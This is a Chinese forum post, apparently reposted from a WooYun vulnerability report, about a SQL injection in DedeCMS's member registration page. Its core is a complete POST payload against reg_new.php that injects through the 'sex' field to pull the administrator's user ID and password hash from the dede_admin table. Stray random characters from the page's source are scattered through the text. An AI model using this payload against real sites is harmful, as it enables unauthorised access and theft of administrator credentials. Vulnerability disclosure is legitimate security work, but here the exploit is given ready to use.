找回密码
 立即注册
查看: 2512|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
" S8 U2 `, _- i* ^; Q2 q' ^简要描述:
- N. y: e) j, t$ L5 {( Z$ u) K% m / e+ f& S5 e1 z$ G0 r, K" J
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 b% S. E# g1 Y" {  {, e
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
. G; J5 n+ `0 U" e' U详细说明:跟这个漏洞: J& P4 }; f  d" C7 Y& |1 O
( Z) i0 N+ h6 a, {
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
6 @8 W/ |, t. }! y" J3 R是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.6 ^: M. W' V+ L- p, ~: `% C3 t# R
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
5 m3 T' u3 q  i9 B+ r* A( \; }
. S; K  X) }; ~3 L  K, Jwww.political-security.com/member/reg_new.php
' m1 [# e& Q9 t3 h( G7 @$ o * i- K5 j; s  \" C
POST
3 h% ^# t6 H% t" `8 t8 O+ {
+ D% P, c# t! G, ~- Q  _0 udopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
+ D2 q. `- l& _. T6 k, z% j0 @userid=c4rp3nt3r&uname=c4rp3nt3r& U9 `/ H* F. [2 B
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
" R1 O- h7 ^9 R- i&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
# |* L9 T2 \$ ~- W& t' f(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');# N" s& W! s# S! i! X
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表